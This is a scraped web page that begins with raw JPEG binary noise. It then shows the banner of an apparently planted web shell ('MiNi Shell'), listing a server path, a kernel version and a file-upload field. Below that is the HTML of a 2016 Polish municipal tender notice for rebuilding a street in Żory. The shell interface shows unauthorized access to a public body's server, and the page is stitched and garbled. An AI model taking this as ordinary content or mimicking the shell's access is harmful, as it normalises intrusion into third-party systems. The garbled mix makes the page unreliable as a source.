JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160324/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160324/30985-N-2016.html

<p class="kh_header"><b>Żory: Przebudowa ul. Przemysłowej w Żorach.</b><br>
<b>Numer ogłoszenia: 30985 - 2016; data zamieszczenia: 24.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska  Żory , Al. Wojska Polskiego 25, 44-240 Żory, woj. śląskie, tel. 32 4348245, faks 32 4348248.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zory.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ul. Przemysłowej w Żorach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót
Roboty drogowe
1.	ROBOTY PRZYGOTOWAWCZE
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
- odtworzenie i wyznaczenie trasy i punktów wysokościowych,
- rozbiórka istniejących nawierzchni brukowych oraz asfaltowych,
- rozbiórka krawężników oraz obrzeży betonowych na ławie betonowej z oporem,
- załadunek i wywóz materiałów z rozbiórki nawierzchni, krawężników i obrzeży betonowych na wysyp (z potwierdzeniem odbioru i opłatą za składowanie), kostkę brukową nadającą się do ponownego wykorzystania po ułożeniu na paletach przewieźć do ZTK Żory, ul. Okrężna 5 za pokwitowaniem,
2. PODBUDOWY
- korytowanie wraz z profilowaniem podłoża pod nowe nawierzchnie,
- załadunek i wywóz materiałów z korytowania,
- podbudowa z kruszywa łamanego stabilizowanego mechanicznie o uziarnieniu 0/31,5mm gr. 15cm i gr. 20cm, o uziarnieniu 31,5/63mm gr. 20cm,
- warstwa gruntu rodzimego stabilizowanego cementem o Rm = 2,5MPa gr. 25cm,
- warstwa z piasku gruboziarnistego gr. 10cm,
- warstwa podbudowy zasadniczej z betonu asfaltowego o uziarnieniu AC22P gr. 7cm,
3. ELEMENTY ULIC
- ułożenie nowych obrzeży betonowych 8x30cm na ławie betonowej z oporem C12/15,
- ułożenie nowych krawężników betonowych15x30cm i 15x22xm na ławie betonowej z oporem C12/15,
- wykonanie odwodnienia drogi: montaż kompletnych betonowych wpustów ściekowych ulicznych z osadnikiem, podłączenie wpustów ulicznych do studni kanalizacji deszczowej przykanalikami z rur PVC jednowarstwowych litych typu ciężkiego S klasa SN8 SDR34 dz200, włączenie poprzez wykonanie przejścia szczelnego,
4. NAWIERZCHNIE
- nawierzchnia z kostki betonowej brukowej wibroprasowanej gr. 8cm na podsypce cementowo -piaskowej 1:4, rodzaj kostki (trapezowa szara),
- warstwa wiążąca z betonu asfaltowego o uziarnieniu AC22W gr 6cm,
- warstwa ścieralna z betonu asfaltowego o uziarnieniu AC11S gr 5cm,
5. ROBOTY WYKOŃCZENIOWE
- oznakowanie poziome grubowarstwowe chemoutwardzalne,
- oznakowanie pionowe - zastosować słupki konstrukcji wsporczej z rury stalowej ocynkowanej 2-calowej, znaki odblaskowe z folii pierwszej i drugiej generacji zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (z późniejszymi zmianami),
- regulacja pionowa studzienek dla urządzeń podziemnych,
- zabezpieczenie istniejącego uzbrojenia terenu,
- pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
- badania nośności podłoża gruntowego,
- humusowanie pobocza i skarp z obsianiem trawą,
- porządkowanie terenu po robotach budowlanych.

Wymagania ogólne dotyczące robót drogowych		
- Wykonać regulację wysokościowa istniejących studni kanalizacyjnych, teletechnicznych, włazów (pokryw) kanałów ciepłowniczych oraz zaworów wodociągowych, gazowych - w przypadku wystąpienia kolizji  z zakresem prac.
- Wykonawca w ramach zadania wykona i przekaże Zamawiającemu inwentaryzację geodezyjną powykonawczą z naniesieniem na zasoby geodezyjne przez uprawnionego geodetę w 3 egz. - przedłożyć na dzień odbioru lub przedstawić poświadczenie z RZG o złożeniu materiałów z prac inwentaryzacyjnych.
- Roboty prowadzić zgodnie z instrukcją oznakowania robót prowadzonych w pasie drogowym, a w razie  konieczności opracować i zatwierdzić w wydziale Infrastruktury Miejskiej i Inwestycji Urzędu Miasta Żory projekt organizacji ruchu - realizuje Wykonawca a koszty uwzględnia w ofercie (koszty ogólne).
- W czasie wykonywania robót zapewnić dojazd i dojście do posesji.
- Wykonawca we wskazanych miejscach przez Zamawiającego wykona badania nośności podłoża gruntowego płytą VSS lub sondą dynamiczną. Wyniki badań zostaną dostarczone Zamawiającemu najpóźniej w dniu odbioru robót. Badania wykonać przy udziale przedstawicieli Zamawiającego.
- Wykonawca odpowiada za ochronę środowiska na placu budowy i w jego otoczeniu, podejmuje odpowiednie środki w celu zabezpieczenia dróg prowadzących do placu budowy przed zniszczeniem i zanieczyszczeniem spowodowanym jego środkami transportowymi. Po zakończeniu robót przywraca je do stanu pierwotnego.
- Stosowane materiały powinny posiadać atesty oraz deklaracje zgodności - materiały potrzebne dla celów realizacji przedmiotowego zamówienia są w gestii Wykonawcy.
- Masy ziemne, gruz i odpady powstałe w trakcie robót przekazać odbiorcy odpadu posiadającemu zezwolenie na prowadzenie działalności w zakresie odzysku odpadów zgodnie z ustawą o odpadach z dnia 14 grudnia 2012 roku (Dz. U. z 2013r. poz. 21) lub wykorzystać we własnym zakresie zgodnie z posiadanym zezwoleniem na prowadzenie przetwarzania odpadów. Przekazanie odpadów należy udokumentować pisemnie.
- Wykonanie zasilania w energię elektryczną oraz wodę dla potrzeb placu budowy wg potrzeb oraz demontaż zasilania - realizuje Wykonawca a koszty uwzględnia w ofercie (koszty ogólne).
- Dla planowanych robót drogowych przed rozpoczęciem robót należy dokonać geodezyjnego okazania granic działek pasa drogowego oraz dokonać wytyczenia inwestycji w terenie.

Roboty elektryczne
1. Budowa oświetlenia ul. Przemysłowej na odcinku od ul. Zdrojowej do słupa oświetleniowego nr 24 włącznie (odcinek od słupa nr 25 do nr 29 nie jest objęty obecnym zamówieniem):
- szafa oświetlenia ulicznego SOU  - 1 kpl.
- linia kablowa YAKYXSżo 4x35 mm2  - 1012 m,
- przyłącze do sieci rozdzielczej n.n. wraz z podłączeniem i przeprowadzeniem odbioru przez Tauron,
- słup oświetleniowy aluminiowy h=6m na fundamencie z wysięgnikiem L=1m i złączem IZK 24 kpl.,
- oprawy oświetleniowe LED/32 LEDS  - 24 szt.,
- uziemienie, rury osłonowe, pomiary elektryczne, inwentaryzacja geodezyjna, 
- prace prowadzić pod nadzorem firmy konserwującej i eksploatującej oświetlenie w Gminie Miejskiej Żory,
- inne prace wynikające z dokumentacji projektowej.
2. Budowa kanalizacji technologicznej z rur PCV o liczbie warstw 1, liczbie rur 4, liczbie otworów 4 -  od studni nr 1 do nr 18 (cała zaprojektowana kanalizacja technologiczna jest objęta obecnym zamówieniem):
-kanalizacja z rur PCV 110 (632m x 4 otwory)  - 2528 m,
- studnie SKR-2 z pokrywami ciężkimi, zamkami, wspornikami - 18 kpl.,
- inwentaryzacja geodezyjna oraz inne prace wynikające z projektu.
3. Zabezpieczenie i przebudowa istniejących sieci energetycznych zgodnie z warunkami określonymi przez Tauron nr TDO11/DZU/MM/43/U/S15/101069/2015 z wyłączeniem przebudowy linii napowietrznej zlokalizowanej przy skrzyżowaniu  ul. Przemysłowej z ul. Rybnicką.
a) Wyłączyć, odłączyć i obustronnie uziemić istniejącą linię kablową SN relacji GPZ Żory - R972 oraz GPZ Żory - R973. Na przedmiotowej linii w zbliżeniu z projektowanym chodnikiem oraz przy prostopadłym przejściu przez ul. Przemysłową założyć dwudzielne rury osłonowe typu A160PS,
b) Wyłączyć, odłączyć i uziemić istniejące linie kablowe typu YAKY 4x240 mm2 relacji R975-R972. Na przedmiotowej linii w zbliżeniu z projektowanym chodnikiem oraz przy prostopadłym przejściu przez ul. Przemysłową założyć dwudzielne rury osłonowe typu A160PS,
c) Wyłączyć, odłączyć i uziemić istniejące linie kablowe typu YAKY 4x240 mm2 relacji R975-R961. Na przedmiotowej linii w zbliżeniu z projektowanym chodnikiem oraz przy prostopadłym przejściu przez ul. Przemysłową założyć dwudzielne rury osłonowe typu A160PS.

W ofercie należy uwzględnić koszty:
- wykonania wykopów i zabezpieczenia rurami kabli,
- koszty nadzoru robót i odbioru przez Tauron prac zabezpieczających sieci kablowe,
- koszty związane z wyłączeniem sieci i dopuszczeniem do robót zabezpieczających przez Tauron,
- wykonania inwentaryzacji geodezyjnej.

Roboty sanitarne
zakres robót sanitarnych zgodnie z dokumentacją projektową oraz wydaną decyzją o pozwolenie na budowę. 
- budowa kanalizacji sanitarnej i deszczowej,
- renowacja istniejących studni kanalizacji sanitarnej i deszczowej,
- w wycenie należy uwzględnić dodatkowo dwie studnie fi 1200 głębokość 4,5m,  
- inspekcja TV kanalizacji sanitarnej i deszczowej wraz z pomiarem spadków,
- zabudowa rur ochronnych na istniejących gazociągach zgodnie z uzgodnieniem z PGNiG,
- inwentaryzacja powykonawcza.

3) Przedstawione w dokumentacji przetargowej wskazania na urządzenia techniczne/  materiały/znak towarowy z podaniem producenta oraz wskazania na normy o których mowa w art. 30 ust. 1-3 ustawy pzp, należy traktować jako przykładowe, ze względu na zasady ustawy pzp, a zwłaszcza art. 29 i 30. Oznacza to, że Wykonawcy mogą zaproponować inne niż wyszczególnione w dokumentacji przetargowej wskazania z zachowaniem odpowiednich, równoważnych parametrów technicznych dla osiągnięcia oczekiwanej funkcjonalności całego układu, będącego przedmiotem zamówienia.
Wykonawca jest zobowiązany wykazać w ofercie jakie elementy zostały zmienione i określić jakie w ich miejsce proponuje. 
Ponadto Wykonawca winien wykazać w sposób nie budzący wątpliwości, że wskazane rozwiązania są równoważne.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.27.00-2, 45.23.31.42-6, 45.23.32.22-1, 45.23.21.30-2, 45.23.11.10-9, 34.92.21.00-7, 45.31.11.00-1, 45.31.12.00-2, 45.31.61.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 25.000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje żadnych wymagań do warunku których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykonał roboty budowlane w zakresie niezbędnym do wykazania spełniania warunku wiedzy  i doświadczenia w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, tj.: 2 zamówienia ( 2 umowy)  polegające na budowie lub przebudowie lub remoncie nawierzchni drogowej dla ruchu kołowego lub pieszego, z których każde obejmowało swoim zakresem wykonanie min. 2000 m2 nawierzchni z asfaltu oraz  załączy dowody dotyczące najważniejszych robót, określających czy roboty te zostały wykonane w sposób należyty oraz wskazujących czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje żadnych wymagań do warunku których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wskaże osoby, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialne za kierowanie robotami budowlanymi:
a) w specjalności instalacyjnej w zakresie sieci i instalacji elektrycznych (uprawnienia w zakresie kierowania, nadzorowania i kontrolowania budowy) 
b) w specjalności instalacyjnej w zakresie sieci sanitarnych (uprawnienia 
w zakresie kierowania, nadzorowania i kontrolowania budowy) 
c) w specjalności obejmującej uprawnienia do budowy lub przebudowy dróg (uprawnienia w zakresie kierowania, nadzorowania i kontrolowania budowy).
wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności oraz informacją  o podstawie do dysponowania tymi osobami. 
Zamawiający dopuszcza łączenie funkcji kierowników robót i sprawowanie ich przez jedną osobę pod warunkiem posiadania przez tę osobę odpowiednich uprawnień.
W przypadku osób posiadających uprawnienia wydane poza terytorium Rzeczpospolitej Polskiej wymaga się aby osoby te spełniały odpowiednie warunki opisane w art. 12a ustawy Prawo budowlane. Zamawiający uzna uprawnienia zdobyte na podstawie przepisów obowiązujących przed dniem wejścia w życie ustawy Prawo budowlane oraz właściwych aktów wykonawczych do niniejszej ustawy - w oparciu o art. 104 ustawy z dnia 7 lipca 1994r. - Prawo budowlane (Dz. U. z 2003r. Nr 207, poz. 2016 ze zmianami).
Wykonawca oświadczy, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje żadnych wymagań do warunku których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie Wykonawcy dotyczące obowiązku podatkowego
Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia lub inny dokument potwierdzający ten fakt.
W celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów zobowiązanie lub inny dokument, ponadto winno wskazywać: 
a) jaki jest zakres dostępnych wykonawcy zasobów innego podmiotu,
b) w jaki sposób zostaną wykorzystane zasoby innego podmiotu przez wykonawcę przy wykonywaniu zamówienia,
c) jakiego charakteru stosunki będą łączyły wykonawcę z innym podmiotem,
d) jaki jest zakres i w jakim okresie inny podmiot będzie brał udział przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Okres gwarancji na roboty budowlane (36,48,60 miesięcy) - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>I. Przyczyna/okoliczności                                         
Zmiana lub rezygnacja z podwykonawcy będącego podmiotem na zasobach którego opierał się wykonawca w celu spełnienia warunków udziału w postępowaniu na zasadach art. 26 ust. 2b 
Skutek - zmiana w umowie/aneks
Wprowadzenie  innego podmiotu (Podwykonawca lub Wykonawca) który potwierdza spełnienie warunków w stopniu nie mniejszym niż wymagany w SIWZ 
II. Przyczyna/okoliczności                                         
Długotrwałe, tj. powyżej 5 dni kalendarzowych, warunki atmosferyczne uniemożliwiające prowadzenie robót  zapisane w dzienniku budowy 
Skutek - zmiana w umowie/aneks
Przedłużenie terminu realizacji umowy o tyle dni, ile trwały warunki atmosferyczne uniemożliwiające prowadzenie robót 
III. Przyczyna/okoliczności 
 Potrzeba wprowadzenia lub zmiany zakresu robót wykonywanych przez podwykonawcę.
Skutek - zmiana w umowie/aneks
Spisania aneksu do umowy określającego zakres robót wykonywanych przez podwykonawcę
IV. Przyczyna/okoliczności 
Znalezienie niewybuchów lub znalezisk archeologicznych
Skutek - zmiana w umowie/aneks
Przesunięcie terminu wykonania zadania o taki czas, ile trwało wstrzymanie robót związane z usunięciem niewybuchów 
V. Przyczyna/okoliczności 
Wstrzymanie prac budowlanych przez właściwy organ lub Zamawiającego z przyczyn niezawinionych przez Wykonawcę 
Skutek - zmiana w umowie/aneks
Spisanie aneksu do umowy wydłużającego termin wykonania robót o tyle dni ile trwało wstrzymanie robót</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.zory.pl/?c=7074<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Żory, Aleja Wojska Polskiego 25, 44-240 Żory, pokój 203, II piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.04.2016 godzina 12:00, miejsce: Urząd Miasta Żory, Aleja Wojska Polskiego 25, 44-240 Żory, informacja - parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





